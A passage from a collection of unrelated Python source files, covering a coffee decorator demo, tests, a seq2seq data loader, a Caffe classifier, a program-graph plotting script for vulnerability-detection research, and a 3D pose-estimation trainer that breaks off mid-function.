return self.decorated_cafe.ingredientes() + ', con vainilla!'
if __name__ == "__main__":
#Aqui no usas decoradores,solo creas el objeto normal y ves sus caracteristicas
cafe = CafeSimple()
print('ingredientes: '+cafe.ingredientes()+
'; A solo '+str(cafe.precio()))
cafecito =(Vainilla(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito =(Leche(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito =(Canela(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito = Canela(Leche(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
|
11482230
|
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
from .in_ import In
__all__ = ['Usertag', 'UsertagInterface']
# TODO: разобраться со служебными словами
class UsertagInterface(ApiInterfaceBase):
in__: [In]
photo_of_you: bool
class Usertag(PropertyMapper, UsertagInterface):
pass
|
11482237
|
import unittest
import TestInput
import logger
from membase.api.rest_client import RestConnection
log = logger.Logger.get_logger()
class VerifyVersionTest(unittest.TestCase):
servers = None
log = None
input = TestInput.TestInput
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInput.TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.servers = self.input.servers
# read each server's version number and compare it to self.version
def test_verify_version(self):
expected_version = self.input.test_params['version']
for serverInfo in self.servers:
rest = RestConnection(serverInfo)
rest.log_client_error('test_verify_version test-method running')
version = rest.get_pools()
self.log.info('expected version on node {0} is {1}'.format(serverInfo.ip, expected_version))
self.log.info('actual version on node {0} is {1}'.format(serverInfo.ip, version.implementationVersion))
if version.implementationVersion.startswith(expected_version.lower()):
self.log.info("CORRECT VERSION INSTALLED")
else:
self.assertEqual(first=expected_version,
second=version.implementationVersion,
msg='INCORRECT VERSION INSTALLED for server @ %s' % serverInfo.ip)
|
11482259
|
import sys
from itertools import chain, combinations
import operator
import networkx as nx
def find_powerset(iterable):
"""
powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)
"""
xs = list(iterable)
# note we return an iterator rather than a list
return map(set, chain.from_iterable(combinations(xs,n) for n in range(len(xs)+1)))
def is_connected(cand_aspect): # ((node_type_1, node_type_2, edge_type), ...)
subgraph = nx.Graph()
for node_type_1, node_type_2, edge_type in cand_aspect:
subgraph.add_edge(node_type_1, node_type_2)
return nx.is_connected(subgraph)
input_file = sys.argv[1] # python calc_aspect_inconsistency.py XXX_corr.csv
atom_score_dict = {}
edge_type_set = set()
with open(input_file, "r") as f_in:
first_line_split = f_in.readline().strip().split(",")
for line in f_in:
center_node_type, other_node_i_type, other_node_j_type, edge_type_i, edge_type_j, gamma_str = line.strip().split(",")
gamma = float(gamma_str)
edge_type_set.add((center_node_type, other_node_i_type, edge_type_i))
edge_type_set.add((center_node_type, other_node_j_type, edge_type_j))
atom_score_dict[(edge_type_i, edge_type_j)] = gamma
aspect_score_dict = {}
for cand_aspect in find_powerset(edge_type_set): # currently implemented with brutal force
if len(cand_aspect) < 2:
continue
if not is_connected(cand_aspect):
continue
cur_aspect_score = 0.
for aug_edge_type_pair in combinations(cand_aspect, 2):
edge_type_pair = (aug_edge_type_pair[0][2], aug_edge_type_pair[1][2])
if edge_type_pair not in atom_score_dict:
edge_type_pair = (edge_type_pair[1], edge_type_pair[0])
if edge_type_pair not in atom_score_dict:
continue
cur_aspect_score += atom_score_dict[edge_type_pair]
aspect_score_dict[tuple(cand_aspect)] = cur_aspect_score
aspect_score_sorted_list = sorted(aspect_score_dict.items(), key=operator.itemgetter(1))
for aspect_socre in aspect_score_sorted_list:
cur_node_set = set()
cur_edge_list = []
for aug_edge in aspect_socre[0]:
cur_node_set.add(aug_edge[0])
cur_node_set.add(aug_edge[1])
cur_edge_list.append(aug_edge[2])
print "Nodes", cur_node_set, "Edges", cur_edge_list
print "Inc", aspect_socre[1]
|
11482263
|
from functools import partial
from typing import * # pylint: disable=W0401,W0614
import torch
class Seq2SeqDataset(torch.utils.data.Dataset):
def __init__(self, data: List[Tuple[torch.Tensor, torch.Tensor]]) -> None:
self.data = data
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:
# source_seq, target_seq
example = self.data[index]
return example[0], example[1]
class Seq2SeqDataLoader(torch.utils.data.DataLoader):
def __init__(self, dataset, **kargs: Dict[str, Any]) -> None:
kargs["collate_fn"] = partial(
self.pad_collate_fn,
pad=kargs.pop("pad", 0),
batch_first=kargs.pop("batch_first", False),
sort_key=kargs.pop("sort_key", lambda x: len(x[0])),
device=kargs.pop("device", None),
)
super(Seq2SeqDataLoader, self).__init__(dataset, **kargs)
@classmethod
def pad_collate_fn(
cls,
batch: List[Tuple[torch.Tensor, torch.Tensor]],
pad: int = 0,
batch_first: bool = False,
sort_key: Optional[
Callable[[Tuple[torch.Tensor, torch.Tensor]], Any]
] = None,
device: torch.device = None,
) -> Tuple[torch.Tensor, List[int], torch.Tensor, List[int]]:
"""Creates mini-batch tensors from the list of tuples (src_seq, trg_seq).
We build a custom collate_fn rather than using default collate_fn,
because merging sequences (including padding) is not supported in default.
Seqeuences are padded to the length provided or to the maximum length
of mini-batch sequences (dynamic padding).
Args:
batch: list of tuple (src_seq, trg_seq).
- src_seq: torch tensor of shape (?); variable length.
- trg_seq: torch tensor of shape (?); variable length.
pad: value to use as padding.
batch_first: if True, then the input and output tensors are provided
as (batch_size, padded_length).
sort_key: A key to use for sorting examples in order to batch
together examples with similar lengths and minimize padding.
Returns:
src_seqs: torch tensor of shape (padded_length, batch_size).
src_lengths: list of length (batch_size); valid length for each
padded source sequence.
trg_seqs: torch tensor of shape (padded_length, batch_size).
trg_lengths: list of length (batch_size); valid length for each
padded target sequence.
"""
def merge(sequences, batch_first, pad, device):
lengths = [len(seq) for seq in sequences]
batch_size = len(sequences)
padded_length = max(lengths)
if batch_first:
padded_seqs = torch.full(
(batch_size, padded_length),
pad,
dtype=torch.long,
device=device,
)
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[i, :end] = seq[:end]
else:
padded_seqs = torch.full(
(padded_length, batch_size),
pad,
dtype=torch.long,
device=device,
)
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[:end, i] = seq[:end]
# pylint: disable=E1102
lengths = torch.tensor(lengths, dtype=torch.long, device=device)
return (padded_seqs, lengths)
# sort a list by sequence length (descending order)
# to use pack_padded_sequence
if sort_key is not None:
batch.sort(key=sort_key, reverse=True)
# seperate source and target sequences
src_seqs, trg_seqs = zip(*batch)
# merge sequences
src_seqs, src_lengths = merge(src_seqs, batch_first, pad, device)
trg_seqs, trg_lengths = merge(trg_seqs, batch_first, pad, device)
return src_seqs, src_lengths, trg_seqs, trg_lengths
|
11482298
|
import caffe
import cv2
import sys
import matplotlib.pyplot as plt
#import Image
def deploy(img_path):
caffe.set_mode_gpu()
MODEL_JOB_DIR = '/dli/data/digits/20180301-185638-e918'
DATASET_JOB_DIR = '/dli/data/digits/20180222-165843-ada0'
ARCHITECTURE = MODEL_JOB_DIR + '/deploy.prototxt'
WEIGHTS = MODEL_JOB_DIR + '/snapshot_iter_735.caffemodel'
# Initialize the Caffe model using the model trained in DIGITS.
net = caffe.Classifier(ARCHITECTURE, WEIGHTS,
channel_swap=(2,1,0),
raw_scale=255,
image_dims=(256, 256))
# Create an input that the network expects.
input_image= caffe.io.load_image(img_path)
test_image = cv2.resize(input_image, (256,256))
mean_image = caffe.io.load_image(DATASET_JOB_DIR + '/mean.jpg')
test_image = test_image-mean_image
prediction = net.predict([test_image])
#print("Input Image:")
#plt.imshow(sys.argv[1])
#plt.show()
#Image.open(input_image).show()
print(prediction)
##Create a useful output
print("Output:")
if prediction.argmax()==0:
print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif"
else:
print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670"
##Ignore this part
if __name__ == '__main__':
print(deploy(sys.argv[1]))
|
11482300
|
from importlib import reload
import sastvd.helpers.dclass as svddc
import sastvd.helpers.joern as svdj
import sastvd.linevd as lvd
from graphviz import Digraph
reload(svdj)
def get_digraph(nodes, edges, edge_label=True):
"""Plote digraph given nodes and edges list."""
dot = Digraph(comment="Combined PDG", engine="neato")
nodes = [n + [svdj.nodelabel2line(n[1])] for n in nodes]
colormap = {"": "white"}
for n in nodes:
if n[2] not in colormap:
colormap[n[2]] = svdj.randcolor()
for n in nodes:
style = {"shape": "circle", "fixedsize": "true", "width": "0.5"}
dot.node(str(n[0]), str(n[1]), **style)
for e in edges:
style = {"color": "black"}
if e[2] == "CALL":
style["style"] = "solid"
style["color"] = "purple"
elif e[2] == "AST":
style["style"] = "solid"
style["color"] = "black"
elif e[2] == "CFG":
style["style"] = "solid"
style["color"] = "red"
elif e[2] == "CDG":
style["style"] = "solid"
style["color"] = "black"
elif e[2] == "REACHING_DEF":
style["style"] = "dashed"
style["color"] = "black"
elif "DDG" in e[2]:
style["style"] = "dashed"
style["color"] = "red"
# style["dir"] = "back"
else:
style["style"] = "solid"
style["color"] = "black"
style["penwidth"] = "1"
if edge_label:
dot.edge(str(e[0]), str(e[1]), e[2], **style)
else:
dot.edge(str(e[0]), str(e[1]), **style)
return dot
_id = svddc.BigVulDataset.itempath(182352)
lineMap = {
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
8: 8,
9: 9,
12: 11,
13: 12,
14: 13,
16: 14,
17: 15,
21: 18,
22: 19,
25: 21,
26: 22,
29: 25,
31: 27,
33: 28,
34: 29,
35: 30,
36: 31,
}
# Get CPG
n, e = svdj.get_node_edges(_id)
n.lineNumber = n.lineNumber.map(lineMap).fillna("")
e.line_in = e.line_in.map(lineMap).fillna("")
e.line_out = e.line_out.map(lineMap).fillna("")
# Swap line numbers
e["tmp1"] = e.line_in
e["tmp2"] = e.line_out
e.line_out = e.tmp1
e.line_in = e.tmp2
# Group nodes
n, e = lvd.ne_groupnodes(n, e)
# Reverse DDG edges for method declaration
alt_e = e[(e.line_out == 1) & (e.dataflow != "")].copy()
alt_e.outnode = alt_e.innode
alt_e.innode = 1
e = e[e.line_out != 1]
e = e.append(alt_e)
# Plot graph
n["node_label"] = n["lineNumber"].astype(str)
e = e[e.innode != e.outnode]
e.etype = e.apply(
lambda x: f"DDG: {x.dataflow}" if len(x.dataflow) > 0 else x.etype, axis=1
)
e[e.dataflow == "!sig_none"]
en = e[e.etype != "CFG"]
en = en[en.etype != "AST"]
en = en[en.etype != "REACHING_DEF"]
en = en[en.etype != "DDG: <RET>"]
en = en[en.etype != "DDG: !sig_none"]
en = en[en.etype != "DDG: now = timespec64_to_ktime(ts64)"]
en = en.merge(n[["id", "name", "code"]], left_on="line_in", right_on="id")
# en = en[~((en.etype.str.contains("=")) & (~en.name.str.contains("assignment")))]
# Only keep assignment DDG
en.name = en.name.fillna("<operator>.assignment")
en = en[en.name == "<operator>.assignment"]
en.dataflow = en.dataflow.fillna("")
en["left_assign"] = en.code.apply(lambda x: x.split("=")[0].strip())
en = en[en.apply(lambda x: x.left_assign in x.dataflow, axis=1)]
# Add CDG edges back
en = en[(en.etype.str.contains("DDG"))]
en = en.append(e[e.etype == "CDG"])
# Add other edges
en = en.append({"innode": 3, "outnode": 18, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 3, "outnode": 22, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 3, "outnode": 25, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 9, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 19, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 25, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 5, "outnode": 18, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 5, "outnode": 19, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 6, "outnode": 8, "etype": "DDG"}, ignore_index=1)
# Reverse edges nack
en["tmp"] = en.innode
en["innode"] = en.outnode
en["outnode"] = en.tmp
n = svdj.drop_lone_nodes(n, en)
n = n.append({"id": 4, "node_label": "4"}, ignore_index=1)
dot = get_digraph(
n[["id", "node_label"]].to_numpy().tolist(),
en[["outnode", "innode", "etype"]].to_numpy().tolist(),
edge_label=False,
)
dot.render("/tmp/tmp.gv", view=True)
|
11482363
|
import itertools
import numpy as np
import scipy.sparse as sp
import tvm
from tvm.ir import IRModule
from tvm import relay
from tvm.relay.data_dep_optimization import simplify_fc_transpose
def run_func(func, params, x):
with tvm.transform.PassContext(opt_level=3):
lib = relay.build(func, "llvm", params=params)
from tvm.contrib import graph_runtime
ctx = tvm.cpu(0)
dtype = "float32"
m = graph_runtime.GraphModule(lib["default"](ctx))
# set inputs
m.set_input("data", tvm.nd.array(x.astype(dtype)))
# execute
m.run()
# get outputs
tvm_output = m.get_output(0)
return tvm_output.asnumpy()
def test_simplify_fc_transpose():
data = relay.var("data", shape=(1, 32), dtype="float32")
x = relay.nn.relu(data)
w1 = relay.var("w1", shape=(32, 64), dtype="float32")
y = relay.nn.dense(x, relay.transpose(w1, axes=[1, 0]))
z = relay.nn.relu(y)
w2 = relay.var("w2", shape=(64, 16), dtype="float32")
zz = relay.nn.dense(z, relay.transpose(w2, axes=[1, 0]))
func = relay.Function(relay.analysis.free_vars(zz), zz)
params = {
"w1": tvm.nd.array(np.random.uniform(-1, 1, (32, 64)).astype("float32")),
"w2": tvm.nd.array(np.random.uniform(-1, 1, (64, 16)).astype("float32")),
}
x_np = np.random.randn(1, 32).astype("float32")
old_result = run_func(func, params, x_np)
new_func, new_params = simplify_fc_transpose.convert(func, params)
new_result = run_func(new_func, new_params, x_np)
np.testing.assert_allclose(old_result, new_result, atol=1e-5, rtol=1e-5)
|
11482377
|
from tracardi.process_engine.tql.domain.operations import OrOperation, AndOperation
class Values:
def __init__(self):
self.values = []
def append_or_value(self, value):
if isinstance(value, OrOperation):
self.values = self.values + value['bool']['should']
else:
self.values.append(value)
def append_and_value(self, value):
if isinstance(value, AndOperation):
self.values = self.values + value['bool']['must']
else:
self.values.append(value)
|
11482382
|
import os
import torch
import shutil
import numpy as np
from lib.loss.loss import mpjpe, n_mpjpe, p_mpjpe, mean_velocity_error, weighted_mpjpe
from lib.dataloader.generators import UnchunkedGenerator
from lib.camera.camera import image_coordinates
from lib.skeleton.bone import get_bone_length_from_3d_pose, get_bone_unit_vector_from_3d_pose
class Trainer():
def __init__(self,
data_config, model_config, train_config, plot_config,
train_generator, test_generator,
models, optimizer,
kps_left, kps_right, joints_left, joints_right, plotter, best_performance=None):
self.data_config = data_config
self.model_config = model_config
self.train_config = train_config
self.plot_config = plot_config
self.lr = train_config['LEARNING_RATE']
self.optimizer = optimizer
self.train_generator = train_generator
self.test_generator = test_generator
self.pos_model_train = models['train_pos']
self.pos_model_test = models['test_pos']
self.trj_model_train = models['train_trj']
self.trj_model_test = models['test_trj']
self.min_loss = 1e5 if best_performance is None else best_performance
self.losses_3d_train = []
self.losses_3d_valid = []
self.kps_left = kps_left
self.kps_right = kps_right
self.joints_left = joints_left
self.joints_right = joints_right
self.receptive_field = model_config['NUM_FRAMES']
self.plotter = plotter
@staticmethod
def eval_data_prepare(receptive_field, inputs_2d, inputs_3d):
inputs_2d_p = torch.squeeze(inputs_2d)
if inputs_3d is not None:
inputs_3d_p = inputs_3d.permute(1, 0, 2, 3)
else:
inputs_3d_p = inputs_3d
out_num = inputs_2d_p.shape[0] - receptive_field + 1
eval_input_2d = torch.empty(out_num, receptive_field, inputs_2d_p.shape[1], inputs_2d_p.shape[2])
for i in range(out_num):
eval_input_2d[i, :, :, :] = inputs_2d_p[i:i + receptive_field, :, :]
return eval_input_2d, inputs_3d_p
def train(self, epoch, mlog):
N = 0
epoch_loss_3d_train = 0
epoch_loss_3d_pos = 0
epoch_loss_3d_trj = 0
epoch_loss_3d_bone = 0
self.pos_model_train.train()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_train.train()
iter = 0
for cam, batch_3d, batch_2d in self.train_generator.next_epoch():
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
inputs_3d = torch.from_numpy(batch_3d.astype('float32'))
inputs_param = torch.from_numpy(cam.astype('float32'))
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if self.model_config['TRAJECTORY_MODEL']:
inputs_traj = inputs_3d[:, :, :1].clone()
if self.data_config['RAY_ENCODING']:
# do nothing
if self.model_config['TRAJECTORY_MODEL']:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
else:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
self.optimizer.zero_grad()
# Predict 3D poses
predicted_3d_pos = self.pos_model_train(inputs_2d, inputs_param)
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)
epoch_loss_3d_train += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
N += inputs_3d.shape[0] * inputs_3d.shape[1]
total_loss = loss_3d_pos
if self.model_config['BONE_COMPARISON']:
predicted_bone_length = get_bone_length_from_3d_pose(predicted_3d_pos)
target_bone_length = get_bone_length_from_3d_pose(inputs_3d)
loss_3d_bone_length = mpjpe(predicted_bone_length, target_bone_length)
predicted_bone_unit_vector = get_bone_unit_vector_from_3d_pose(predicted_3d_pos)
target_bone_unit_vector = get_bone_unit_vector_from_3d_pose(inputs_3d)
loss_3d_bone_angle = mpjpe(predicted_bone_unit_vector, target_bone_unit_vector)
epoch_loss_3d_bone += inputs_3d.shape[0] * inputs_3d.shape[1] * (loss_3d_bone_length.item() + loss_3d_bone_angle.item())
total_loss += (loss_3d_bone_length + loss_3d_bone_angle)
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_trj = self.trj_model_train(inputs_2d, inputs_param)
w = torch.abs(1 / inputs_traj[:, :, :, 2]) # Weight inversely proportional to depth
loss_3d_traj = weighted_mpjpe(predicted_3d_trj, inputs_traj, w)
assert inputs_traj.shape[0] * inputs_traj.shape[1] == inputs_3d.shape[0] * inputs_3d.shape[1]
epoch_loss_3d_train += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_traj.item()
epoch_loss_3d_trj += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_traj.item()
total_loss += loss_3d_traj
# ---------------- visualization ---------------- #
if iter % 2048 == 0 and self.plotter is not None and epoch % 64 == 0:
self.plotter.show_plot(
epoch, inputs_2d.detach().cpu().numpy(),
inputs_3d.detach().cpu().numpy(),
predicted_3d_pos.detach().cpu().numpy(),
dataset=self.data_config['DATASET'],
gt=self.data_config['KEYPOINTS']
)
# ---------------- visualization ---------------- #
iter += 1
total_loss.backward()
self.optimizer.step()
self.losses_3d_train.append(epoch_loss_3d_train / N)
torch.cuda.empty_cache()
if self.plotter:
# plot all the losses
self.plotter.log_metric('train', self.losses_3d_train[-1] * 1000, epoch)
self.plotter.log_metric('train_pos', epoch_loss_3d_pos / N * 1000, epoch)
self.plotter.log_metric('train_trj', epoch_loss_3d_trj / N * 1000, epoch)
self.plotter.log_metric('train_bone', epoch_loss_3d_bone / N * 1000, epoch)
# plot all the learning rates
self.plotter.log_metric('lr', self.lr, epoch)
# return the current epoch's mpjme
return self.losses_3d_train[-1], self.lr
def test(self, epoch, mlog):
with torch.no_grad():
self.pos_model_test.load_state_dict(self.pos_model_train.state_dict(), strict=True)
self.pos_model_test.eval()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_test.load_state_dict(self.trj_model_train.state_dict(), strict=True)
self.trj_model_test.eval()
epoch_loss_3d_valid = 0
epoch_loss_3d_pos = 0
epoch_loss_3d_trj = 0
epoch_loss_3d_bone = 0
N = 0
# Evaluate on test set
for cam, batch, batch_2d in self.test_generator.next_epoch():
cam_param = np.array([[(-c.Rw2c.T @ c.Tw2c)[2][0], c.cam_pitch_rad] for c in cam]).astype('float32')
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
inputs_3d = torch.from_numpy(batch.astype('float32'))
##### convert size
inputs_2d, inputs_3d = self.eval_data_prepare(self.receptive_field, inputs_2d, inputs_3d)
inputs_param = torch.from_numpy(cam_param)
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if self.model_config['TRAJECTORY_MODEL']:
inputs_traj = inputs_3d.clone()
if self.data_config['RAY_ENCODING']:
# do nothing
if self.model_config['TRAJECTORY_MODEL']:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
else:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos, inputs_3d).item()
if self.model_config['BONE_COMPARISON']:
predicted_bone_length = get_bone_length_from_3d_pose(predicted_3d_pos)
target_bone_length = get_bone_length_from_3d_pose(inputs_3d)
loss_3d_bone_length = mpjpe(predicted_bone_length, target_bone_length)
predicted_bone_unit_vector = get_bone_unit_vector_from_3d_pose(predicted_3d_pos)
target_bone_unit_vector = get_bone_unit_vector_from_3d_pose(inputs_3d)
loss_3d_bone_angle = mpjpe(predicted_bone_unit_vector, target_bone_unit_vector)
epoch_loss_3d_bone += inputs_3d.shape[0] * inputs_3d.shape[1] * (loss_3d_bone_length.item() + loss_3d_bone_angle.item())
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_trj = self.trj_model_test(inputs_2d, inputs_param)
predicted_3d_pos += predicted_3d_trj
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_traj)
w = torch.abs(1 / inputs_traj[:, :, 0, 2])
epoch_loss_3d_trj += inputs_3d.shape[0] * inputs_3d.shape[1] * weighted_mpjpe(predicted_3d_trj, inputs_traj[:, :, 0:1], w).item()
else:
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)
epoch_loss_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
N += inputs_3d.shape[0] * inputs_3d.shape[1]
self.losses_3d_valid.append(epoch_loss_3d_valid / N)
# Save checkpoint if necessary
if epoch % self.train_config['CHECKPOINT_FREQUENCY'] == 0:
chk_path = os.path.join(self.train_config['CHECKPOINT'], 'epoch_{}.bin'.format(epoch))
mlog.info('Saving epochs {}\'s checkpoint to {}.'.format(epoch, chk_path))
if self.model_config['TRAJECTORY_MODEL']:
torch.save({
'epoch': epoch,
'lr': self.lr,
'best_performance': self.losses_3d_valid[-1] * 1000 if self.losses_3d_valid[-1] * 1000 < self.min_loss else self.min_loss,
'random_state': self.train_generator.random_state(),
'optimizer': self.optimizer.state_dict(),
'model_pos': self.pos_model_train.state_dict(),
'model_trj': self.trj_model_train.state_dict()
}, chk_path)
else:
torch.save({
'epoch': epoch,
'lr': self.lr,
'best_performance': self.losses_3d_valid[-1] * 1000 if self.losses_3d_valid[-1] * 1000 < self.min_loss else self.min_loss,
'random_state': self.train_generator.random_state(),
'optimizer': self.optimizer.state_dict(),
'model_pos': self.pos_model_train.state_dict(),
}, chk_path)
#### save best checkpoint
best_chk_path = os.path.join(self.train_config['CHECKPOINT'], 'best_epoch.bin'.format(epoch))
if self.losses_3d_valid[-1] * 1000 < self.min_loss:
self.min_loss = self.losses_3d_valid[-1] * 1000
mlog.info('Saving best checkpoint to {} with mpjpe: {}.'.format(best_chk_path, self.min_loss))
shutil.copy(chk_path, best_chk_path)
cmd = 'rm {}'.format(chk_path)
os.system(cmd)
# Decay learning rate exponentially
self.lr *= self.train_config['LR_DECAY']
for param_group in self.optimizer.param_groups:
param_group['lr'] *= self.train_config['LR_DECAY']
# Decay BatchNorm momentum
if self.model_config['MODEL'] == 'VideoPose3D':
momentum = self.train_config['INITIAL_MOMENTUM'] * np.exp(-(epoch-1) / self.train_config['EPOCHS'] * np.log(self.train_config['INITIAL_MOMENTUM'] / self.train_config['FINAL_MOMENTUM']))
self.pos_model_train.module.set_bn_momentum(momentum)
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_train.module.set_bn_momentum(momentum)
if self.plotter:
# plot all the losses
self.plotter.log_metric('test', self.losses_3d_valid[-1] * 1000, epoch)
self.plotter.log_metric('test_pos', epoch_loss_3d_pos / N * 1000, epoch)
self.plotter.log_metric('test_trj', epoch_loss_3d_trj / N * 1000, epoch)
self.plotter.log_metric('test_bone', epoch_loss_3d_bone / N * 1000, epoch)
# return the current epoch's mpjme
return self.losses_3d_valid[-1]
def evaluate_core(self, test_generator, action=None, return_predictions=False, flip_test=False):
epoch_loss_3d_pos = 0
epoch_loss_3d_pos_procrustes = 0
epoch_loss_3d_pos_scale = 0
epoch_loss_3d_vel = 0
epoch_loss_3d_root = 0
with torch.no_grad():
self.pos_model_test.eval()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_test.eval()
N = 0
for cam, batch, batch_2d in test_generator.next_epoch():
cam_param = np.array([(-cam.Rw2c.T @ cam.Tw2c)[2][0], cam.cam_pitch_rad]).astype('float32')
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
if flip_test:
inputs_2d_flip = inputs_2d.clone()
inputs_2d_flip[:, :, :, 0] *= -1
inputs_2d_flip[:, :, self.kps_left + self.kps_right, :] = inputs_2d_flip[:, :, self.kps_right + self.kps_left, :]
if return_predictions:
inputs_2d, _ = self.eval_data_prepare(self.receptive_field, inputs_2d, None)
inputs_param = torch.from_numpy(np.tile(cam_param, (inputs_2d.shape[0], 1)))
if self.model_config['TRAJECTORY_MODEL']:
return (
self.pos_model_test(inputs_2d, inputs_param) + self.trj_model_test(inputs_2d, inputs_param)
).squeeze(0).cpu().numpy()
else:
return self.pos_model_test(inputs_2d, inputs_param).squeeze(0).cpu().numpy()
if self.model_config['TRAJECTORY_MODEL'] or self.data_config['RAY_ENCODING']:
# do nothing
pass
else:
batch[:, :, 1:] -= batch[:, :, 0:1]
batch[:, :, 0] = 0
inputs_3d = torch.from_numpy(batch.astype('float32'))
inputs_2d, inputs_3d = self.eval_data_prepare(self.receptive_field, inputs_2d, inputs_3d)
inputs_param = torch.from_numpy(np.tile(cam_param, (inputs_2d.shape[0], 1)))
if flip_test:
inputs_2d_flip, _ = self.eval_data_prepare(self.receptive_field, inputs_2d_flip, inputs_3d)
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if flip_test:
inputs_2d_flip = inputs_2d_flip.cuda()
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_pos_flip = self.pos_model_test(inputs_2d_flip, inputs_param)
predicted_3d_pos_flip[:, :, :, 0] *= -1
predicted_3d_pos_flip[:, :, self.kps_left + self.kps_right] = predicted_3d_pos_flip[:, :,
self.kps_right + self.kps_left]
predicted_3d_pos = torch.mean(torch.cat((predicted_3d_pos, predicted_3d_pos_flip), dim=1),
dim=1,
keepdim=True)
predicted_3d_trj = self.trj_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_trj_flip = self.trj_model_test(inputs_2d_flip, inputs_param)
predicted_3d_trj_flip[:, :, :, 0] *= -1
predicted_3d_trj = torch.mean(torch.cat((predicted_3d_trj, predicted_3d_trj_flip), dim=1),
dim=1,
keepdim=True)
predicted_3d_pos += predicted_3d_trj
if not cam is None:
pred = predicted_3d_pos.cpu().numpy()
target = inputs_3d.cpu().numpy()
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(pred)
target_world = cam.normalized2world(target)
else:
pred_world = cam.camera2world(pred)
target_world = cam.camera2world(target)
predicted_3d_pos = torch.from_numpy(pred_world)
inputs_3d = torch.from_numpy(target_world)
else:
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_pos_flip = self.pos_model_test(inputs_2d_flip, inputs_param)
predicted_3d_pos_flip[:, :, :, 0] *= -1
predicted_3d_pos_flip[:, :, self.kps_left + self.kps_right] = predicted_3d_pos_flip[:, :,
self.kps_right + self.kps_left]
predicted_3d_pos = torch.mean(torch.cat((predicted_3d_pos, predicted_3d_pos_flip), dim=1), dim=1,
keepdim=True)
if self.data_config['RAY_ENCODING']:
# do nothing
pred = predicted_3d_pos.cpu().numpy()
target = inputs_3d.cpu().numpy()
pred_world = cam.normalized2world(pred)
target_world = cam.normalized2world(target)
predicted_3d_pos = torch.from_numpy(pred_world)
inputs_3d = torch.from_numpy(target_world)
else:
# do nothing
pass
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos, inputs_3d).item()
epoch_loss_3d_root += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos[:, :, 0:1, :], inputs_3d[:, :, 0:1, :]).item()
epoch_loss_3d_pos_scale += inputs_3d.shape[0] * inputs_3d.shape[1] * n_mpjpe(predicted_3d_pos, inputs_3d).item()
inputs = inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])
predicted_3d_pos = predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])
